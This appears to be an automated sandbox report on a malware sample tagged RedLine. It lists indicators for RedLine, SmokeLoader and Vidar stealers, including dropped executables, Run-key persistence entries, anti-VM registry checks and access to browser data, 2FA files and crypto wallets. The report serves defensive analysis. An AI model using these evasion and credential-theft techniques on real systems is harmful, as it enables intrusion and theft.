redline | baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15

Change Default File Association

T1042

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4004	3584	rundll32.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6232	3584	rundll32.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8124	3584	rundll32.exe	23

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral10/memory/4944-256-0x0000000002820000-0x0000000002858000-memory.dmp	family_redline

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 5608 created 4592	5608	WerFault.exe	112

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 7608 created 5616	7608	svchost.exe	241

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral10/memory/4196-304-0x0000000003E00000-0x0000000003ED3000-memory.dmp	family_vidar
behavioral10/memory/4196-314-0x0000000000400000-0x00000000021BE000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral10/files/0x000400000001ab13-123.dat	aspack_v212_v242
behavioral10/files/0x000400000001ab13-125.dat	aspack_v212_v242
behavioral10/files/0x000400000001ab15-129.dat	aspack_v212_v242
behavioral10/files/0x000400000001ab12-124.dat	aspack_v212_v242
behavioral10/files/0x000400000001ab12-131.dat	aspack_v212_v242
behavioral10/files/0x000400000001ab12-130.dat	aspack_v212_v242
behavioral10/files/0x000400000001ab15-127.dat	aspack_v212_v242

Blocklisted process makes network request 48 IoCs

flow	pid	Process
150	7860	MsiExec.exe
152	7860	MsiExec.exe
154	7860	MsiExec.exe
156	7860	MsiExec.exe
158	7860	MsiExec.exe
159	7860	MsiExec.exe
160	7860	MsiExec.exe
163	7860	MsiExec.exe
166	7860	MsiExec.exe
167	7860	MsiExec.exe
169	7860	MsiExec.exe
170	7860	MsiExec.exe
171	7860	MsiExec.exe
173	7860	MsiExec.exe
175	7860	MsiExec.exe
176	7860	MsiExec.exe
180	7860	MsiExec.exe
181	7860	MsiExec.exe
182	7860	MsiExec.exe
188	7860	MsiExec.exe
189	7860	MsiExec.exe
190	7860	MsiExec.exe
191	7860	MsiExec.exe
192	7860	MsiExec.exe
193	7860	MsiExec.exe
196	7860	MsiExec.exe
199	7860	MsiExec.exe
200	7860	MsiExec.exe
201	7860	MsiExec.exe
202	7860	MsiExec.exe
203	7860	MsiExec.exe
205	7860	MsiExec.exe
206	7860	MsiExec.exe
207	7860	MsiExec.exe
210	7860	MsiExec.exe
211	7860	MsiExec.exe
212	7860	MsiExec.exe
213	7860	MsiExec.exe
214	7860	MsiExec.exe
215	7860	MsiExec.exe
216	7860	MsiExec.exe
217	7860	MsiExec.exe
218	7860	MsiExec.exe
219	7860	MsiExec.exe
220	7860	MsiExec.exe
221	7860	MsiExec.exe
222	7860	MsiExec.exe
223	7860	MsiExec.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	WerFault.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	setup.exe

Executes dropped EXE 63 IoCs

pid	Process
3476	setup_installer.exe
4084	setup_install.exe
4188	Fri156ec98815f89c.exe
4196	Fri1544861ac3fe6a.exe
4228	Fri157e25afd971.exe
4272	Fri155442fc38b.exe
4320	Fri15af75ee9b.exe
4348	Fri1553f0ee90.exe
4376	Fri157e25afd971.tmp
4700	LzmwAqmV.exe
4764	2153740.exe
4836	Conhost.exe
4816	WerFault.exe
4936	Chrome 5.exe
4944	6559868.exe
5044	PublicDwlBrowser1100.exe
4388	2.exe
4592	setup.exe
4656	1604829.exe
2728	WinHoster.exe
4416	7292878.exe
4512	Pubdate.exe
4152	7432657.exe
3776	setup_2.exe
4648	3002.exe
4688	jhuuee.exe
4308	ultramediaburner.exe
4516	BearVpn 3.exe
5188	setup_2.exe
5420	setup_2.tmp
5692	5575411.exe
5744	3002.exe
5764	3629965.exe
5872	1318013.exe
4552	3665333.exe
440	5087658.exe
4308	ultramediaburner.exe
5632	1187813.exe
4372	Tyvagaelora.exe
5924	ultramediaburner.tmp
5788	Linyhashaeli.exe
4912	UltraMediaBurner.exe
6440	services64.exe
4260	installer.exe
6504	GcleanerEU.exe
5472	anyname.exe
7076	anyname.exe
7156	gcleaner.exe
8180	sihost64.exe
5452	FileSyncConfig.exe
7492	uauvcwe
4324	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
7148	search_awesome.exe
4828	setup.exe
2292	setup.exe
2740	setup.exe
6960	setup.exe
6212	FreeVPN.exe
5256	FreeVPN.exe
6196	FreeVPN.exe
3816	FreeVPN.exe
2356	uauvcwe
7776	uauvcwe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1604829.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1604829.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3665333.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3665333.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	Tyvagaelora.exe

Loads dropped DLL 64 IoCs

pid	Process
4084	setup_install.exe
4084	setup_install.exe
4084	setup_install.exe
4084	setup_install.exe
4084	setup_install.exe
4084	setup_install.exe
4376	Fri157e25afd971.tmp
4520	rundll32.exe
4308	ultramediaburner.exe
5420	setup_2.tmp
6252	rundll32.exe
4260	installer.exe
4260	installer.exe
4260	installer.exe
7344	MsiExec.exe
7344	MsiExec.exe
4196	Fri1544861ac3fe6a.exe
4196	Fri1544861ac3fe6a.exe
8136	rundll32.exe
7860	MsiExec.exe
7860	MsiExec.exe
7860	MsiExec.exe
7860	MsiExec.exe
7860	MsiExec.exe
7860	MsiExec.exe
7860	MsiExec.exe
7860	MsiExec.exe
7860	MsiExec.exe
7860	MsiExec.exe
4260	installer.exe
7860	MsiExec.exe
7860	MsiExec.exe
8068	MsiExec.exe
8068	MsiExec.exe
8068	MsiExec.exe
8068	MsiExec.exe
8068	MsiExec.exe
8068	MsiExec.exe
8068	MsiExec.exe
7860	MsiExec.exe
5452	FileSyncConfig.exe
5452	FileSyncConfig.exe
5452	FileSyncConfig.exe
5452	FileSyncConfig.exe
5452	FileSyncConfig.exe
5452	FileSyncConfig.exe
4324	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
4324	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
4324	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
4324	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
4324	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
4324	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
4324	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
7148	search_awesome.exe
7148	search_awesome.exe
7148	search_awesome.exe
7148	search_awesome.exe
7148	search_awesome.exe
7148	search_awesome.exe
7148	search_awesome.exe
7148	search_awesome.exe
7148	search_awesome.exe
6212	FreeVPN.exe
5256	FreeVPN.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral10/files/0x000400000001ab33-289.dat	themida
behavioral10/files/0x000400000001ab33-255.dat	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\""	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\""	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	Conhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows NT\\SHetogonaepi.exe\""	WerFault.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	OneDriveSetup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3665333.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1604829.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\T:	installer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
48	ip-api.com
99	ip-api.com

Drops file in System32 directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2559286294-2439613352-4032193287-1000	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90}	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 4A403C0692870753	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4656	1604829.exe
4552	3665333.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3828 set thread context of 5040	3828	svchost.exe	119
PID 6440 set thread context of 7804	6440	services64.exe	235

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\WtcvfJHWXKxx4x0kuS1koRJtnKITppOI_IvcXXDNrsc.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\close_btn.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\question3.png	FreeVPN.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\FreeVPN\frpc.exe	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\css\keen_main.css	FreeVPN.exe
File created	C:\Program Files\Mozilla Firefox\defaults\pref\autoconfig.js	setup.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\facebook.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\twitter.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\menu_btn1.png	FreeVPN.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\FreeVPN\html\html\images\background_off.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\brave-logotype-full-color-small.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\WB6rgjTg_oRfj6mlXZJbb_esZW2xOQ-xsNqO47m55DA.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\Search Awesome\FF\certificate.cer	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\lang.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\menu_btn2.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\open_selector1.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\js\move.js	FreeVPN.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-TC4U7.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\FreeVPN\settings.json	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
File opened for modification	C:\Program Files (x86)\Search Awesome\FF\cacert\ca.cert.pem	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\default.ico	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
File opened for modification	C:\Program Files (x86)\FreeVPN\frpc.exe	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\star_blue.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\index.html	FreeVPN.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\FreeVPN\log	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\fontawesome-webfont.ttf	FreeVPN.exe
File created	C:\Program Files\Mozilla Firefox\firefox.cfg	setup.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\4z2U46_RRLOfkoHsWJG3vxJtnKITppOI_IvcXXDNrsc.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\T0N0BD55aMuIijZeoZ4TJBTbgVql8nDJpwnrE27mub0.woff2	FreeVPN.exe
File created	C:\Program Files\Windows Security\AUEASNLEDT\ultramediaburner.exe.config	WerFault.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\Search Awesome\FF\bin\ssl3.dll	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\big_logo.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\tray_disconnect.png	FreeVPN.exe
File opened for modification	C:\Program Files (x86)\Search Awesome\FF\bin\plds4.dll	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\ohKfORL_YnhBMzkCPoIqwjUj_cnvWIuuBMVgbX098Mw.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\OMD20Sg9RTs7sUORCEN-7SYE0-AqJ3nfInTTiDXDjU4.woff2	FreeVPN.exe
File opened for modification	C:\Program Files\Mozilla Firefox\defaults\pref\autoconfig.js	setup.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\DZ_YjBPqZ88vcZCcIXm6VjUj_cnvWIuuBMVgbX098Mw.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\fontawesome-webfont.svg	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\menu_btn_back.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\off_switch.png	FreeVPN.exe
File created	C:\Program Files (x86)\FarLabUninstaller\is-1775G.tmp	setup_2.tmp
File created	C:\Program Files (x86)\FreeVPN\libcurl.dll	freevpn_setup_e_wvsgitrka6bd5k9a2fnlmb74.exe
File opened for modification	C:\Program Files (x86)\Search Awesome\	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\txt_logo.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\Wu5Iuha-XnKDBvqRwQzAG_esZW2xOQ-xsNqO47m55DA.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\js\json2.min.js	FreeVPN.exe
File created	C:\Program Files (x86)\Search Awesome\FF\bin\COPYING	search_awesome.exe
File opened for modification	C:\Program Files (x86)\Search Awesome\FF\certificate.cer	search_awesome.exe
File created	C:\Program Files (x86)\Search Awesome\FF\bin\softokn3.dll	search_awesome.exe
File opened for modification	C:\Program Files (x86)\Search Awesome\FF\db\empty\secmod.db	search_awesome.exe
File created	C:\Program Files (x86)\Search Awesome\FF\bin\nspr4.dll	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\7Auwp_0qiz-afT3GLRrX.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\js\notify.js	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\css\font-awesome.css	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\ohKfORL_YnhBMzkCPoIqwkbcKLIaa1LC45dFaAfauRA.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\js\index.js	FreeVPN.exe
File created	C:\Program Files (x86)\Search Awesome\FF\bin\plc4.dll	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\MLKvhAbswThSVACnSTWCpxJtnKITppOI_IvcXXDNrsc.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\enable_vpn.gif	FreeVPN.exe

Drops file in Windows directory 45 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSIF8A0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA3A.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSIF64C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBD2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI157D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9CC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI150F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI163C.tmp	msiexec.exe
File created	C:\Windows\Installer\f74f42c.msi	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Installer\f74f429.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF9BD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI167B.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI17C5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDB8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI160C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f74f429.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF8EF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF97E.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	Process not Found
File opened for modification	C:\Windows\Installer\MSIAA8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE16.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSIF841.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF92F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI13B6.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI15DC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 38 IoCs

pid	pid_target	Process	procid_target
5608	4196	WerFault.exe	93
5600	4388	WerFault.exe	110
4808	4196	WerFault.exe	93
5588	4592	WerFault.exe	112
5936	4196	WerFault.exe	93
4132	4592	WerFault.exe	112
5728	4196	WerFault.exe	93
5752	4196	WerFault.exe	93
5772	4592	WerFault.exe	112
4804	4592	WerFault.exe	112
5536	4196	WerFault.exe	93
4816	4592	WerFault.exe	112
2228	4196	WerFault.exe	93
5504	4592	WerFault.exe	112
4924	4196	WerFault.exe	93
5608	4592	WerFault.exe	112
6064	4196	WerFault.exe	93
6296	4196	WerFault.exe	93
6560	4196	WerFault.exe	93
6656	4764	WerFault.exe	103
7048	4196	WerFault.exe	93
7336	6504	WerFault.exe	186
7528	6504	WerFault.exe	186
7672	6504	WerFault.exe	186
7772	6504	WerFault.exe	186
7868	4196	WerFault.exe	93
7932	7156	WerFault.exe	194
7984	7156	WerFault.exe	194
8024	7156	WerFault.exe	194
8072	7156	WerFault.exe	194
8184	7156	WerFault.exe	194
7596	6504	WerFault.exe	186
4504	6504	WerFault.exe	186
7992	6504	WerFault.exe	186
4212	7156	WerFault.exe	194
8164	7156	WerFault.exe	194
7332	7156	WerFault.exe	194
6684	5692	WerFault.exe	135

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uauvcwe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uauvcwe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri15af75ee9b.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri15af75ee9b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uauvcwe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uauvcwe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uauvcwe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri15af75ee9b.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uauvcwe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uauvcwe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uauvcwe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uauvcwe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
